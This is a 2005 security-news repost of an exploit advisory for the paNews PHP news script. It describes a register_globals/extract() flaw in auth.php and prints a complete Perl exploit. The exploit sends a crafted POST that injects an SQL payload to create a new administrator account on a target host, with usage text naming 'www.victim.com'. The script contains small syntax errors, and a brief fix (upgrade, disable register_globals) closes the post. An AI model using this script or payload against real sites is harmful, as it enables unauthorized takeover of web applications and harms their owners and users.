Main Menu
Network
Sponsor
Top 10 Sites
Partners
|
|
Top Submit newsSubscribe 
Communication | Computer Crime | Digital Audio, Video, Photo | General News | Hardware | Internet | Mobile | PDA | Security | Software | Vulnerability |
Previous articleBack to news listNext article
| Sponsored links | Want to become one of our authors and see your work published on ALLSeek.iNFO ?
| | paNews SQL Injection Exploit |
|---|
Categorie: Vulnerability
Posted: 2005-03-28 by basher13
Views: 858
| Current Rating: Not rated
|
| | Details |
|---|
Update:
11:35 PM 3/28/2005
Subject:
" paNews SQL Injection Exploit "
Description:
paNews is written in PHP script by Andrew Langland
paNews is a news management script to use on your site.
Users can use paCode, special code designed to allow
the adding of images and font changes in the posts without
allowing users to use HTML to post harmful things such as Java
scripts and applets. It has several other features making adding
entries and controlling it easily.
Vulnerability:
Vulnerability in administrating code of paNews allows to inject
malicious php files to be run on a vulnerable server
PHP file injection works only with following settings:
1. register_globals=On
2. folder "includes" is writable
sample source vulnerable in /includes/auth.php ;
?
(..)
function login() {
global $error,$mysql_prefix,$_COOKIE,$_SESSION,$_LOGIN,$_GET,
$_POST,$myip,$authtype;
extract ($_GET);
extract ($_POST);
$username = strtolower($username);
$password = strtolower($password);
$query = mysql_query("SELECT * FROM `".$mysql_prefix."_auth`");
if (mysql_num_rows($query) == 0) {
$pass2 = MD5($password);
mysql_query("INSERT INTO `".$mysql_prefix."_auth`
VALUES ('','$username','$pass2','',
'admins|cat|comment|newsadd|newsedit|prefset|setup',
'','$myip',UNIX_TIMESTAMP(),UNIX_TIMESTAMP())");
(..)
?
This exploit utilize SQL injection for create a new user with admin privileges on paNews
software system.Login into system administration whit username and password that use on
exploit code. (DAMN i had english bad..sorry for that!)
Exploit:
#!/usr/bin/perl
# paNews - SQL injection exploit
# ------------------------------
#
# Greats:FraMe at Kernelpanik Labs (has discovered bug) ,tjomka.
# info: 98.to/infamous
use IO::Socket;
if (@ARGV < 1)
{
system "clear";
print "paNews SQL Injection Exploit\n\n";
print "---------------------------------\n";
print "INFGP - Hacking&Security Research\n;
print "\n\n";
print "[-]Usage: pnews.pl [host] [path_news] user pass \n";
print "[!]Exam: pnews.pl www.victim.com panews/index.php jhondoe bego \n";
exit(1);
}
system "clear";
$server = $ARGV[0];
$path= $ARGV[2];
$usr= $ARGV[3];
$pass= $ARGV[4];
system "clear";
print "\n[+]Connecting to host:\n\n";
print $server;
$GOATSE = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80"); unless ($GOATSE)
{
die "[-] $server connection [FAILED]\n"
}
print "[+]Creating socket [OK]\n");
print "[+]Sent 0day..\n\n";
$0day = "mysql_prefix%%3Dpanews_auth%%60%%20VALUES%%20(%%22%%22,%%22%s%%22,%%22f63140655b379e65f6cd
87fa3c3da631%%22,%%22hackit%%22,%%22admins%%7Ccat%%7Ccomment%%7Cnewsadd%%7Cnewsedit%%7Cprefset%%7Cset
up%%22,%%22none%%22,%%22127.0.0.1%%22,1,1)%%00";
print $GOATSE "POST /".$path." HTTP/1.0\n";
print $GOATSE "Connection: Keep-Alive\n";
print $GOATSE "Pragma: no-cache\n";
print $GOATSE "Cache-control: no-cache\n";
print $GOATSE "Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\n";
print $GOATSE "Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\n";
print $GOATSE "Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\n";
print $GOATSE "Accept-Language: en\n";
print $GOATSE "Host: $server\n";
print $GOATSE "Referer: http://$server/$path\n";
print $GOATSE "User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041111 Firefox/1.0\n";
print $GOATSE "Content-Type: application/x-www-form-urlencoded\n\n";
print $GOATSE "Keep-Alive: 300\n";
print $GOATSE "action%%3Dlogin%%26username%%3D".$usr."%%26password%%3D".$pass."%%26".$0day."\n\n";
print "[+]Get Admin status..[OK]\n";
print "[>]You can login now whit username $usr and pass $pass\n";
close($GOATSE);
SOlution:
upgrade your version to the latest version.
Set status register_globals "off"
Vendor URL:
http://www.phparena.net/
| | Syndication |
|---|
Permalink Email this
The URI to TrackBack this entry is:
http://allseek.info/news/trackback.php?id=1453
| | User comments (post your comments ) |
|---|
Only registerd members can post comments and articles
|
| Previous articleBack to news listNext article
|
|
|
|
InterJOB.su
|
